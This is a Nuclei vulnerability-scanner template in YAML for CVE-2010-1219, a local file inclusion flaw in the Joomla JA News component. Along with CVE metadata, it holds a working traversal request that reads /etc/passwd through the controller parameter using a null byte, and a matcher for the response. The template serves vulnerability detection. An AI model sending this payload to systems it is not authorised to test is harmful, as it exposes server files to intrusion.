nuclei-templates/http/cves/2010/CVE-2010-1219.yaml

41 lines
1.2 KiB
YAML

id: CVE-2010-1219
info:
name: Joomla! Component com_janews - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/11757
- https://nvd.nist.gov/vuln/detail/CVE-2010-1219
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56901
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2010-1219
cwe-id: CWE-22
epss-score: 0.00813
epss-percentile: 0.79614
cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: com_janews
product: com_janews
tags: cve,cve2010,joomla,lfi,edb
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200